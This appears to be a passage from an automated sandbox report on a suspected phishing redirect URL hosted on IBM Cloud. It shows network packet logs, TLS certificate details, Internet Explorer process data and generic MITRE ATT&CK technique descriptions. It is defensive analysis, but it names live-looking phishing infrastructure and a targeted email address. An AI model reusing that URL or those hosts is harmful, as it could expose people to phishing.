Nov 27, 2020 09:35:22.573530912 CET	290	IN	HTTP/1.1 304 Not Modified Date: Fri, 27 Nov 2020 08:35:22 GMT Connection: keep-alive Last-Modified: Sat, 27 Jun 2020 10:27:29 GMT ETag: "5ef71f11-23c7" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 2964 cf-request-id: 06aa70cb3c00000b4b40b5d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=a39G7lcrqWolN%2FLHKJ%2FuiYULPXhzJ3iltU5v%2BYHWwBvrffHyeUjBAeeAcZObqyht8mE16OMwyE05pCAKygJBrx%2BtAgllTheTi6ASWQYcNReQTxEoaUA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 5f8a83f1fdbc0b4b-AMS

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Nov 27, 2020 09:35:06.455224991 CET	169.46.89.154	443	192.168.2.3	49710	CN=*.us-south.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:06.455224991 CET	169.46.89.154	443	192.168.2.3	49710	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:06.459434032 CET	169.46.89.154	443	192.168.2.3	49709	CN=*.us-south.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:06.459434032 CET	169.46.89.154	443	192.168.2.3	49709	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.356374979 CET	158.175.115.200	443	192.168.2.3	49712	CN=*.eu-gb.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.356374979 CET	158.175.115.200	443	192.168.2.3	49712	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.358099937 CET	158.175.115.200	443	192.168.2.3	49711	CN=*.eu-gb.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.358099937 CET	158.175.115.200	443	192.168.2.3	49711	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.673770905 CET	158.175.115.200	443	192.168.2.3	49713	CN=*.eu-gb.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.673770905 CET	158.175.115.200	443	192.168.2.3	49713	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.675486088 CET	158.175.115.200	443	192.168.2.3	49714	CN=*.eu-gb.cf.appdomain.cloud, OU=IBM Cloud, O=International Business Machines Corporation, L=Armonk, ST=New York, C=US CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Thu Aug 27 02:00:00 CEST 2020 Fri Mar 08 13:00:00 CET 2013	Wed Sep 01 14:00:00 CEST 2021 Wed Mar 08 13:00:00 CET 2023	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:07.675486088 CET	158.175.115.200	443	192.168.2.3	49714	CN=DigiCert SHA2 Secure Server CA, O=DigiCert Inc, C=US	CN=DigiCert Global Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Fri Mar 08 13:00:00 CET 2013	Wed Mar 08 13:00:00 CET 2023		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:25.239747047 CET	149.56.20.211	443	192.168.2.3	49720	CN=premierpawn.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Nov 11 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Wed Feb 10 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 27, 2020 09:35:25.243675947 CET	149.56.20.211	443	192.168.2.3	49719	CN=premierpawn.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Nov 11 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Wed Feb 10 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029
Nov 27, 2020 09:35:27.128124952 CET	31.13.92.14	443	192.168.2.3	49743	CN=*.facebook.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 02 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Sun Jan 31 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.128124952 CET	31.13.92.14	443	192.168.2.3	49743	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.129508972 CET	74.125.128.155	443	192.168.2.3	49741	CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Nov 03 08:33:42 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Jan 26 08:33:42 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.129508972 CET	74.125.128.155	443	192.168.2.3	49741	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.129754066 CET	31.13.92.14	443	192.168.2.3	49744	CN=*.facebook.com, O="Facebook, Inc.", L=Menlo Park, ST=California, C=US CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Mon Nov 02 01:00:00 CET 2020 Tue Oct 22 14:00:00 CEST 2013	Sun Jan 31 00:59:59 CET 2021 Sun Oct 22 14:00:00 CEST 2028	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.129754066 CET	31.13.92.14	443	192.168.2.3	49744	CN=DigiCert SHA2 High Assurance Server CA, OU=www.digicert.com, O=DigiCert Inc, C=US	CN=DigiCert High Assurance EV Root CA, OU=www.digicert.com, O=DigiCert Inc, C=US	Tue Oct 22 14:00:00 CEST 2013	Sun Oct 22 14:00:00 CEST 2028		9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.132386923 CET	74.125.128.155	443	192.168.2.3	49742	CN=*.g.doubleclick.net, O=Google LLC, L=Mountain View, ST=California, C=US CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GTS CA 1O1, O=Google Trust Services, C=US CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Tue Nov 03 08:33:42 CET 2020 Thu Jun 15 02:00:42 CEST 2017	Tue Jan 26 08:33:42 CET 2021 Wed Dec 15 01:00:42 CET 2021	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-16-23-24-65281,29-23-24,0	9e10692f1b7f78228b2d4e424db3a98c
Nov 27, 2020 09:35:27.132386923 CET	74.125.128.155	443	192.168.2.3	49742	CN=GTS CA 1O1, O=Google Trust Services, C=US	CN=GlobalSign, O=GlobalSign, OU=GlobalSign Root CA - R2	Thu Jun 15 02:00:42 CEST 2017	Wed Dec 15 01:00:42 CET 2021		9e10692f1b7f78228b2d4e424db3a98c

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: iexplore.exe PID: 3096 Parent PID: 792

General

Start time:	09:35:03
Start date:	27/11/2020
Path:	C:\Program Files\internet explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x7ff70c1b0000
File size:	823560 bytes
MD5 hash:	6465CB92B25A7BC1DF8E01D8AC5E7596
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: iexplore.exe PID: 4872 Parent PID: 3096

General

Start time:	09:35:04
Start date:	27/11/2020
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3096 CREDAT:17410 /prefetch:2
Imagebase:	0x170000
File size:	822536 bytes
MD5 hash:	071277CC2E3DF41EEEA8013E2AB58D5A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Disassembly

Reset < >

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report https://mincast.us-south.cf.appdomain.cloud/redirect/?email=prampon@soteb.fr

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Phishing:

Networking:

System Summary:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

No static file info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Packets

Code Manipulations

Statistics

Behavior

System Behavior

Analysis Process: iexplore.exe PID: 3096 Parent PID: 792

General

Analysis Process: iexplore.exe PID: 4872 Parent PID: 3096

General

Disassembly